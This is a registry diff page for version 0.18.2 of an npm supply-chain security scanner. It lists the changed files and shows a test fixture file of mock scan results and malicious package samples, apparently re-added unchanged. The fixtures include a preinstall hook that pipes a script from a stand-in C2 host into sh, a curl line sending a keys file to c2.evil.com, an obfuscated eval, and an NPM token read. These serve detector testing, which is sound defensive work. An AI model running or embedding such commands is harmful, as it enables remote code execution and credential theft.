@lateos/npm-scan 0.18.1 → 0.18.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/.dockerignore +20 -20
- package/.husky/pre-commit +1 -1
- package/CHANGELOG.md +233 -199
- package/LICENSING.md +19 -19
- package/README.de.md +708 -708
- package/README.fr.md +707 -707
- package/README.ja.md +704 -704
- package/README.md +826 -826
- package/README.zh.md +708 -708
- package/SECURITY.md +72 -72
- package/backend/cra.js +68 -68
- package/backend/db/schema.sql +32 -32
- package/backend/db.js +88 -88
- package/backend/detectors/atk-001-lifecycle.js +17 -17
- package/backend/detectors/atk-002-obfusc.js +261 -261
- package/backend/detectors/atk-003-creds.js +13 -13
- package/backend/detectors/atk-004-persist.js +13 -13
- package/backend/detectors/atk-005-exfil.js +13 -13
- package/backend/detectors/atk-006-depconf.js +14 -14
- package/backend/detectors/atk-007-typosquat.js +34 -34
- package/backend/detectors/atk-008-tarball-tamper.js +91 -91
- package/backend/detectors/atk-009-dormant-trigger.js +62 -62
- package/backend/detectors/atk-010-sandbox-evasion.js +50 -50
- package/backend/detectors/atk-011-transitive-prop.js +76 -76
- package/backend/detectors/cve-2026-48710-badhost/codePattern.js +99 -99
- package/backend/detectors/cve-2026-48710-badhost/findings.js +105 -105
- package/backend/detectors/cve-2026-48710-badhost/index.js +15 -15
- package/backend/detectors/cve-2026-48710-badhost/manifest.js +305 -305
- package/backend/detectors/cve-2026-48710-badhost/transitive.js +189 -189
- package/backend/detectors/hf-impersonation/index.js +396 -396
- package/backend/detectors/hf-impersonation/jaro-winkler.js +44 -44
- package/backend/detectors/hf-impersonation/known-orgs.js +5 -5
- package/backend/detectors/hf-impersonation/simhash.js +46 -46
- package/backend/detectors/index.js +81 -75
- package/backend/detectors/megalodon/d1-workflow-scan.js +147 -147
- package/backend/detectors/megalodon/d2-credential-harvest.js +61 -61
- package/backend/detectors/megalodon/d3-publish-velocity.js +67 -67
- package/backend/detectors/megalodon/d4-publisher-drift.js +124 -124
- package/backend/detectors/megalodon/d5-bot-commit-identity.js +3 -3
- package/backend/detectors/megalodon/d6-date-anachronism.js +3 -3
- package/backend/detectors/megalodon/index.js +80 -80
- package/backend/detectors/megalodon/types.js +9 -9
- package/backend/detectors/mini-shai-hulud/d1-burst-publish.js +42 -42
- package/backend/detectors/mini-shai-hulud/d2-sibling-compromise.js +116 -116
- package/backend/detectors/mini-shai-hulud/d3-slsa-mismatch.js +72 -72
- package/backend/detectors/mini-shai-hulud/d4-maintainer-anomaly.js +45 -45
- package/backend/detectors/mini-shai-hulud/d5-ioc-check.js +95 -95
- package/backend/detectors/mini-shai-hulud/d6-token-exfil.js +38 -38
- package/backend/detectors/mini-shai-hulud/index.js +118 -118
- package/backend/detectors/mini-shai-hulud/iocs.json +79 -79
- package/backend/detectors/tier1-cloud-imds.js +124 -0
- package/backend/detectors/tier1-infostealer.js +36 -0
- package/backend/detectors/tier1-multistage-postinstall.js +81 -0
- package/backend/detectors/tier1-version-confusion.js +107 -0
- package/backend/fetch.js +175 -175
- package/backend/index.js +4 -4
- package/backend/license.js +89 -89
- package/backend/lockfile.js +379 -379
- package/backend/pdf.js +245 -245
- package/backend/policy.js +193 -193
- package/backend/report.js +254 -254
- package/backend/sbom.js +66 -66
- package/backend/siem/cef.js +32 -32
- package/backend/siem/ecs.js +40 -40
- package/backend/siem/index.js +18 -18
- package/backend/siem/qradar.js +56 -56
- package/backend/siem/sentinel.js +27 -27
- package/backend/vsix-scan/detectors/activation-event-risk.js +116 -116
- package/backend/vsix-scan/detectors/burst-publish.js +52 -52
- package/backend/vsix-scan/detectors/exfil-pattern.js +88 -88
- package/backend/vsix-scan/detectors/known-ioc.js +105 -105
- package/backend/vsix-scan/detectors/orphan-commit-fetch.js +69 -69
- package/backend/vsix-scan/detectors/publisher-anomaly.js +70 -70
- package/backend/vsix-scan/index.js +183 -183
- package/backend/vsix-scan/marketplace-client.js +145 -145
- package/backend/vsix-scan/vsix-iocs.json +31 -31
- package/cli/cli.js +458 -458
- package/deploy/helm/npm-scan/Chart.yaml +21 -21
- package/deploy/helm/npm-scan/templates/_helpers.tpl +8 -8
- package/deploy/helm/npm-scan/templates/api.yaml +93 -93
- package/deploy/helm/npm-scan/templates/ingress.yaml +27 -27
- package/deploy/helm/npm-scan/templates/postgresql.yaml +66 -66
- package/deploy/helm/npm-scan/templates/secrets.yaml +18 -18
- package/deploy/helm/npm-scan/templates/worker.yaml +31 -31
- package/deploy/helm/npm-scan/values.byoc.yaml +74 -74
- package/deploy/helm/npm-scan/values.yaml +102 -102
- package/package.json +57 -57
- package/scripts/download-corpus.js +30 -30
- package/scripts/gen-mal-corpus.js +34 -34
- package/test/fixtures/lockfiles/npm-lock.json +68 -68
- package/test/fixtures/lockfiles/pnpm-lock.yaml +117 -117
- package/test/fixtures/lockfiles/yarn.lock +103 -103
- package/test/fixtures/mock-data.js +69 -69
|
@@ -1,69 +1,69 @@
|
|
|
1
|
-
export const MOCK_SCANS = [
|
|
2
|
-
{
|
|
3
|
-
package_name: 'lodash',
|
|
4
|
-
version: '4.17.21',
|
|
5
|
-
findings: [
|
|
6
|
-
{ id: 'ATK-003', atk_id: 'ATK-003', severity: 'high', title: 'Credential harvest', description: 'Scrapes env vars', evidence: 'process.env.NPM_TOKEN' },
|
|
7
|
-
{ id: 'ATK-009', severity: 'medium', title: 'Time trigger', description: 'Conditional trigger (time-based)', evidence: 'time-based trigger detected' },
|
|
8
|
-
],
|
|
9
|
-
},
|
|
10
|
-
];
|
|
11
|
-
|
|
12
|
-
export const SINGLE_SCAN = MOCK_SCANS[0];
|
|
13
|
-
|
|
14
|
-
export const EMPTY_SCAN = { package_name: 'clean-pkg', version: '1.0.0', findings: [] };
|
|
15
|
-
|
|
16
|
-
export const MULTI_SEV_SCAN = {
|
|
17
|
-
package_name: 'multi-sev', version: '1.0.0', findings: [
|
|
18
|
-
{ id: 'ATK-001', severity: 'critical', title: 'Critical finding' },
|
|
19
|
-
{ id: 'ATK-002', severity: 'high', title: 'High finding' },
|
|
20
|
-
{ id: 'ATK-003', severity: 'medium', title: 'Medium finding' },
|
|
21
|
-
{ id: 'ATK-004', severity: 'low', title: 'Low finding' },
|
|
22
|
-
],
|
|
23
|
-
};
|
|
24
|
-
|
|
25
|
-
export const ALL_ATK_SCAN = {
|
|
26
|
-
package_name: 'all-atk', version: '1.0.0', findings:
|
|
27
|
-
Array.from({ length: 11 }, (_, i) => ({
|
|
28
|
-
id: `ATK-${String(i + 1).padStart(3, '0')}`,
|
|
29
|
-
atk_id: `ATK-${String(i + 1).padStart(3, '0')}`,
|
|
30
|
-
severity: 'medium',
|
|
31
|
-
title: `ATK-${i + 1}`,
|
|
32
|
-
})),
|
|
33
|
-
};
|
|
34
|
-
|
|
35
|
-
export const CLEAN_PACKAGE = {
|
|
36
|
-
name: 'test-pkg',
|
|
37
|
-
version: '1.0.0',
|
|
38
|
-
scripts: { test: 'node test.js' },
|
|
39
|
-
dependencies: { express: '4.0.0' },
|
|
40
|
-
};
|
|
41
|
-
|
|
42
|
-
export const CLEAN_CODE = 'module.exports = function() { return 42 }';
|
|
43
|
-
|
|
44
|
-
export const PREINSTALL_MALICIOUS = {
|
|
45
|
-
scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' },
|
|
46
|
-
};
|
|
47
|
-
|
|
48
|
-
export const EVAL_OBFUSCATED = [{ path: 'i.js', content: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' }];
|
|
49
|
-
|
|
50
|
-
export const CRED_EXFIL = [{ path: 'i.js', content: 'console.log(process.env.NPM_TOKEN)' }];
|
|
51
|
-
|
|
52
|
-
export const PERSIST_CODE = [{ path: 'i.js', content: 'fs.mkdirSync(".vscode")' }];
|
|
53
|
-
|
|
54
|
-
export const NET_EXFIL_CODE = [{ path: 'i.js', content: 'curl --data-binary @keys http://c2.evil.com' }];
|
|
55
|
-
|
|
56
|
-
export const DEP_CONF_PACKAGE = { dependencies: { 'acorn-squatter': '1.0.0' } };
|
|
57
|
-
|
|
58
|
-
export const TYPOSQUAT_PACKAGE = { dependencies: { lodash: 'latest', loddsh: '1.0.0' } };
|
|
59
|
-
|
|
60
|
-
export const TAMPER_PACKAGE = {
|
|
61
|
-
name: 'lodash',
|
|
62
|
-
repository: { url: 'https://github.com/attacker/lodash-evil.git' },
|
|
63
|
-
};
|
|
64
|
-
|
|
65
|
-
export const CI_TRIGGER_CODE = [{ path: 'i.js', content: 'if (process.env.CI) { eval(atob("ZXZpbA==")) }' }];
|
|
66
|
-
|
|
67
|
-
export const SANDBOX_CODE = [{ path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' }];
|
|
68
|
-
|
|
69
|
-
export const PROPAGATION_CODE = [{ path: 'i.js', content: 'exec("npm install ./malicious-pkg")' }];
|
|
1
|
+
export const MOCK_SCANS = [
|
|
2
|
+
{
|
|
3
|
+
package_name: 'lodash',
|
|
4
|
+
version: '4.17.21',
|
|
5
|
+
findings: [
|
|
6
|
+
{ id: 'ATK-003', atk_id: 'ATK-003', severity: 'high', title: 'Credential harvest', description: 'Scrapes env vars', evidence: 'process.env.NPM_TOKEN' },
|
|
7
|
+
{ id: 'ATK-009', severity: 'medium', title: 'Time trigger', description: 'Conditional trigger (time-based)', evidence: 'time-based trigger detected' },
|
|
8
|
+
],
|
|
9
|
+
},
|
|
10
|
+
];
|
|
11
|
+
|
|
12
|
+
export const SINGLE_SCAN = MOCK_SCANS[0];
|
|
13
|
+
|
|
14
|
+
export const EMPTY_SCAN = { package_name: 'clean-pkg', version: '1.0.0', findings: [] };
|
|
15
|
+
|
|
16
|
+
export const MULTI_SEV_SCAN = {
|
|
17
|
+
package_name: 'multi-sev', version: '1.0.0', findings: [
|
|
18
|
+
{ id: 'ATK-001', severity: 'critical', title: 'Critical finding' },
|
|
19
|
+
{ id: 'ATK-002', severity: 'high', title: 'High finding' },
|
|
20
|
+
{ id: 'ATK-003', severity: 'medium', title: 'Medium finding' },
|
|
21
|
+
{ id: 'ATK-004', severity: 'low', title: 'Low finding' },
|
|
22
|
+
],
|
|
23
|
+
};
|
|
24
|
+
|
|
25
|
+
export const ALL_ATK_SCAN = {
|
|
26
|
+
package_name: 'all-atk', version: '1.0.0', findings:
|
|
27
|
+
Array.from({ length: 11 }, (_, i) => ({
|
|
28
|
+
id: `ATK-${String(i + 1).padStart(3, '0')}`,
|
|
29
|
+
atk_id: `ATK-${String(i + 1).padStart(3, '0')}`,
|
|
30
|
+
severity: 'medium',
|
|
31
|
+
title: `ATK-${i + 1}`,
|
|
32
|
+
})),
|
|
33
|
+
};
|
|
34
|
+
|
|
35
|
+
export const CLEAN_PACKAGE = {
|
|
36
|
+
name: 'test-pkg',
|
|
37
|
+
version: '1.0.0',
|
|
38
|
+
scripts: { test: 'node test.js' },
|
|
39
|
+
dependencies: { express: '4.0.0' },
|
|
40
|
+
};
|
|
41
|
+
|
|
42
|
+
export const CLEAN_CODE = 'module.exports = function() { return 42 }';
|
|
43
|
+
|
|
44
|
+
export const PREINSTALL_MALICIOUS = {
|
|
45
|
+
scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' },
|
|
46
|
+
};
|
|
47
|
+
|
|
48
|
+
export const EVAL_OBFUSCATED = [{ path: 'i.js', content: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' }];
|
|
49
|
+
|
|
50
|
+
export const CRED_EXFIL = [{ path: 'i.js', content: 'console.log(process.env.NPM_TOKEN)' }];
|
|
51
|
+
|
|
52
|
+
export const PERSIST_CODE = [{ path: 'i.js', content: 'fs.mkdirSync(".vscode")' }];
|
|
53
|
+
|
|
54
|
+
export const NET_EXFIL_CODE = [{ path: 'i.js', content: 'curl --data-binary @keys http://c2.evil.com' }];
|
|
55
|
+
|
|
56
|
+
export const DEP_CONF_PACKAGE = { dependencies: { 'acorn-squatter': '1.0.0' } };
|
|
57
|
+
|
|
58
|
+
export const TYPOSQUAT_PACKAGE = { dependencies: { lodash: 'latest', loddsh: '1.0.0' } };
|
|
59
|
+
|
|
60
|
+
export const TAMPER_PACKAGE = {
|
|
61
|
+
name: 'lodash',
|
|
62
|
+
repository: { url: 'https://github.com/attacker/lodash-evil.git' },
|
|
63
|
+
};
|
|
64
|
+
|
|
65
|
+
export const CI_TRIGGER_CODE = [{ path: 'i.js', content: 'if (process.env.CI) { eval(atob("ZXZpbA==")) }' }];
|
|
66
|
+
|
|
67
|
+
export const SANDBOX_CODE = [{ path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' }];
|
|
68
|
+
|
|
69
|
+
export const PROPAGATION_CODE = [{ path: 'i.js', content: 'exec("npm install ./malicious-pkg")' }];
|